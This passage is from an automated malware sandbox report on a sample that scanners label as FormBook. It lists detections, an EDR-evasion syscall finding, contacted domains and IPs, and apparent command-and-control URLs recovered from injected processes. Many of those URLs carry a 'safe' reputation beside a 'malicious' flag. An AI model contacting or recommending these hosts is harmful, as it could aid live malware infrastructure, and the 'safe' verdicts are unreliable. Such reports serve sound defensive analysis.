UNIFIEDLAYER-AS-1US United States 29->43 45 legitima.legal 84.32.84.32, 59698, 59699, 59700 NTT-LT-ASLT Lithuania 29->45 47 12 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            r9856_7.exe63%ReversingLabsWin32.Backdoor.FormBook
            r9856_7.exe100%AviraTR/AD.Swotter.whnvz
            r9856_7.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://www.hiretemp.net/Hiring_Staffing.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFi0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/197.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.40%Avira URL Cloudsafe
            http://www.chinaen.org/lol/198.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            http://www.chinaen.org/search.php?act=search0%Avira URL Cloudsafe
            http://www.personal-loans-jp8.xyz/6ycu/?XvhP6L=48n5Gh86tilVUpEn3bMYkhqvO5up5zkqTgQXBFakbnd6q0dGuIyBO7mD/1tgIewitYTTRw7cds46U990bsqw3nwlebvgtAe1RUGRB2MI0lkiowd2cOo1HMJgELRUlBXSLJgYq2E6HCqo&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://fedoraproject.org/0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/204.html0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.html0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/c_html_js_add.php0%Avira URL Cloudsafe
            http://www.hiretemp.net/Immediate_Hiring_Employees.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg20%Avira URL Cloudsafe
            http://www.chinaen.org/lol/202.html0%Avira URL Cloudsafe
            http://www.chinaen.org0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            https://support.hostgator.com/0%Avira URL Cloudsafe
            http://www.justlivn.net/otqc/?XvhP6L=jk/2fo7CpY6PXlaYArzRtoo0AVLLUFDN/Jq+vkOaZ+fPrhUhiTNdX0aA543JRHsuzYf7ebB3TDQsHlnmoSav9wzbQDyRMAafsyNd6ddZozZF1KxmmUfcLkKv5xld9bF92o+2nx1DI9Jm&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/0%Avira URL Cloudsafe
            http://maya24.xyz/bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruh0%Avira URL Cloudsafe
            http://www.thewhitediamond.org/ufia/0%Avira URL Cloudsafe
            http://www.chinaen.org/x5bi/?XvhP6L=JYCf+ZJomMv21wL/A/ZbfBFGIgJsU/wUGcnjHUxnhitVEbVd5ES97oujxAxH+SE+IOTeV6meH+QeTEXNSn72wswjM27hcTXz9HzWUY9luI/8WXXgEAe/tU5ADSlVG/RuaZzqE+6xfFdK&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://www.chinaen.org/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/login.php0%Avira URL Cloudsafe
            http://www.zimra.xyz/knrh/0%Avira URL Cloudsafe
            http://www.hiretemp.net/pa4w/?XvhP6L=dKMHTeotdxQA3vuiSRDg588JUBKwJbza89FzR4k2/BlHdZNbjG9srDVj4iYsPfHZhZaT/x4F9RFLyq608nYJAYQb5LXQOtEiJ4lw7e+xANqPS8JKy934Fa9hsYgKS5KVWYuJXZeSCWTj&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.40%Avira URL Cloudsafe
            http://www.bashei.top/u0n6/0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            http://www.hiretemp.net/Hiring_Firm.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFihEX20%Avira URL Cloudsafe
            http://www.maya24.xyz/bzo0/0%Avira URL Cloudsafe
            http://www.autochemtools.com/i118/0%Avira URL Cloudsafe
            http://www.tigre777gg.online/squz/?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://www.hiretemp.net/px.js?ch=10%Avira URL Cloudsafe
            http://www.personal-loans-jp8.xyz/6ycu/0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://www.maya24.xyz/bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            http://www.hiretemp.net/px.js?ch=20%Avira URL Cloudsafe
            http://www.nuv3.top/7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/199.html0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/196.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/zblogphp.js0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
            https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html0%Avira URL Cloudsafe
            https://dts.gnpge.com0%Avira URL Cloudsafe
            http://searchdiscovered.com/__media__/images/logo.gif)0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js0%Avira URL Cloudsafe
            http://www.autochemtools.com/i118/?XvhP6L=l78tjT99nfWmEsVDs1FvFZ9WuYye9a70xFpF/w9BItZXEYkJuJfqp9pdvrQptbQ2LO1yeOIECnfIu7s7S7+7Q3i1eKl3stoZZ1arBng6e4IDYKgW1i7918V1fhSLuSwuhzNanlWnB/aN&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/200.html0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/201.html0%Avira URL Cloudsafe
            http://www.chinaen.org/x5bi/0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            https://www.htmlit.com.cn/0%Avira URL Cloudsafe
            https://js.users.51.la/21851687.js0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://www.jeandreo.store/a5gd/0%Avira URL Cloudsafe
            http://www.hiretemp.net/sk-logabpstatus.php?a=azI2OHRXUHVzMTBzQXZ5ektDRlFPdm5kMWRrSHFZcXJyR0pab3RFT20%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            http://www.hiretemp.net/display.cfm0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://www.justlivn.net/otqc/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.40%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.tigre777gg.online/squz/0%Avira URL Cloudsafe
            http://www.legitima.legal/7fgk/0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/195.html0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/203.html0%Avira URL Cloudsafe
            http://www.zimra.xyz/knrh/?XvhP6L=YgggYvzCIY9cxyt1YCa2G3R12OneF5/58fBG84NSPGW4/awNicu/ZN4HtGSklex6REK8bsR/OR3Y+MJqd7/88rmQQgGzhJF4KytM6w66NwsLhFIcz78jdTwuasaid4VzQcobuCXl81HP&Xt7D=9p4tP8lp52ndpXM0%Avira URL Cloudsafe
            http://www.legitima.legal/7fgk/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=jsI13KUmBZ1T5rh+bHmke0O+W3Z/A6nMw4DpVk3nSlnNNLSGuDQ/FPhySwGHE5L/lacb6zZ1lT+tB+A3kLGRxOtsHOzzZCR5pN3lBpoImaPzbOWkADZ6ueCTs7gp0g7tISQqu/NYQOSA0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css0%Avira URL Cloudsafe
            https://www.zblogcn.com/0%Avira URL Cloudsafe
            https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://www.nuv3.top/7f48/0%Avira URL Cloudsafe
            https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html0%Avira URL Cloudsafe
            http://www.hiretemp.net/pa4w/0%Avira URL Cloudsafe
            http://www.thewhitediamond.org/ufia/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=zNK014zjWgi1a3eyzMMm2nz3fX543AdpgfXUQgxXNtpCBS2vIzBVVMdfG2b0NYPX0xafoGIjW7/mcYzzWPwRhMM12G8tl2rgt13dQBJV/fCpNzfTXyNrbuK5i1kogSU8patx4VfAZ+EZ0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.chinaen.org
            		188.114.96.3
            		truetrue
              		unknown
              www.personal-loans-jp8.xyz
              		199.59.243.226
              		truetrue
                		unknown
                tigre777gg.online
                		3.33.130.190
                		truetrue
                  		unknown
                  www.bashei.top
                  		23.225.34.75
                  		truetrue
                    		unknown
                    maya24.xyz
                    		65.108.194.49
                    		truetrue
                      		unknown
                      jeandreo.store
                      		162.240.81.18
                      		truetrue
                        		unknown
                        www.hemistryb.online
                        		172.67.221.5
                        		truetrue
                          		unknown
                          thewhitediamond.org
                          		3.33.130.190
                          		truetrue
                            		unknown
                            nuv3.top
                            		152.53.38.0
                            		truetrue
                              		unknown
                              legitima.legal
                              		84.32.84.32
                              		truetrue
                                		unknown
                                justlivn.net
                                		76.223.113.161
                                		truetrue
                                  		unknown
                                  www.zimra.xyz
                                  		162.0.213.94
                                  		truetrue
                                    		unknown
                                    www.hiretemp.net
                                    		208.91.197.13
                                    		truetrue
                                      		unknown
                                      www.autochemtools.com
                                      		35.214.33.204
                                      		truetrue
                                        		unknown
                                        57ddu.top
                                        		154.23.184.218
                                        		truetrue
                                          		unknown
                                          www.legitima.legal
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.57ddu.top
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              time.windows.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.nuv3.top
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.maya24.xyz
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.jeandreo.store
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.justlivn.net
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.loveinpoeipet07.site
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.thewhitediamond.org
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.tigre777gg.online
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.personal-loans-jp8.xyz/6ycu/?XvhP6L=48n5Gh86tilVUpEn3bMYkhqvO5up5zkqTgQXBFakbnd6q0dGuIyBO7mD/1tgIewitYTTRw7cds46U990bsqw3nwlebvgtAe1RUGRB2MI0lkiowd2cOo1HMJgELRUlBXSLJgYq2E6HCqo&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.justlivn.net/otqc/?XvhP6L=jk/2fo7CpY6PXlaYArzRtoo0AVLLUFDN/Jq+vkOaZ+fPrhUhiTNdX0aA543JRHsuzYf7ebB3TDQsHlnmoSav9wzbQDyRMAafsyNd6ddZozZF1KxmmUfcLkKv5xld9bF92o+2nx1DI9Jm&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.thewhitediamond.org/ufia/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/x5bi/?XvhP6L=JYCf+ZJomMv21wL/A/ZbfBFGIgJsU/wUGcnjHUxnhitVEbVd5ES97oujxAxH+SE+IOTeV6meH+QeTEXNSn72wswjM27hcTXz9HzWUY9luI/8WXXgEAe/tU5ADSlVG/RuaZzqE+6xfFdK&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/pa4w/?XvhP6L=dKMHTeotdxQA3vuiSRDg588JUBKwJbza89FzR4k2/BlHdZNbjG9srDVj4iYsPfHZhZaT/x4F9RFLyq608nYJAYQb5LXQOtEiJ4lw7e+xANqPS8JKy934Fa9hsYgKS5KVWYuJXZeSCWTj&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.zimra.xyz/knrh/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.maya24.xyz/bzo0/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.bashei.top/u0n6/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.autochemtools.com/i118/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.maya24.xyz/bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tigre777gg.online/squz/?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.personal-loans-jp8.xyz/6ycu/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.nuv3.top/7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.autochemtools.com/i118/?XvhP6L=l78tjT99nfWmEsVDs1FvFZ9WuYye9a70xFpF/w9BItZXEYkJuJfqp9pdvrQptbQ2LO1yeOIECnfIu7s7S7+7Q3i1eKl3stoZZ1arBng6e4IDYKgW1i7918V1fhSLuSwuhzNanlWnB/aN&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/x5bi/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.jeandreo.store/a5gd/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.justlivn.net/otqc/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tigre777gg.online/squz/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.legitima.legal/7fgk/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.zimra.xyz/knrh/?XvhP6L=YgggYvzCIY9cxyt1YCa2G3R12OneF5/58fBG84NSPGW4/awNicu/ZN4HtGSklex6REK8bsR/OR3Y+MJqd7/88rmQQgGzhJF4KytM6w66NwsLhFIcz78jdTwuasaid4VzQcobuCXl81HP&Xt7D=9p4tP8lp52ndpXMtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.legitima.legal/7fgk/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=jsI13KUmBZ1T5rh+bHmke0O+W3Z/A6nMw4DpVk3nSlnNNLSGuDQ/FPhySwGHE5L/lacb6zZ1lT+tB+A3kLGRxOtsHOzzZCR5pN3lBpoImaPzbOWkADZ6ueCTs7gp0g7tISQqu/NYQOSAtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.nuv3.top/7f48/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.thewhitediamond.org/ufia/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=zNK014zjWgi1a3eyzMMm2nz3fX543AdpgfXUQgxXNtpCBS2vIzBVVMdfG2b0NYPX0xafoGIjW7/mcYzzWPwRhMM12G8tl2rgt13dQBJV/fCpNzfTXyNrbuK5i1kogSU8patx4VfAZ+EZtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/pa4w/true
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.csscmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/chrome_newtabcmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/198.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/pics/29590/bg1.png)cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/197.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.pngcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/Hiring_Staffing.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFicmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.google.comcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000531E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004BAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://nginx.net/cmdkey.exe, 00000008.00000002.3818027240.0000000004B44000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.00000000043D4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/204.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/search.php?act=searchNhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://fedoraproject.org/cmdkey.exe, 00000008.00000002.3818027240.0000000004B44000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.00000000043D4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.htmlcmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.htmlcmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csscmdkey.exe, 00000008.00000002.3818027240.0000000004CD6000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004566000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.csscmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namer9856_7.exe, 00000000.00000002.1385826227.00000000030EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_system/script/c_html_js_add.phpcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
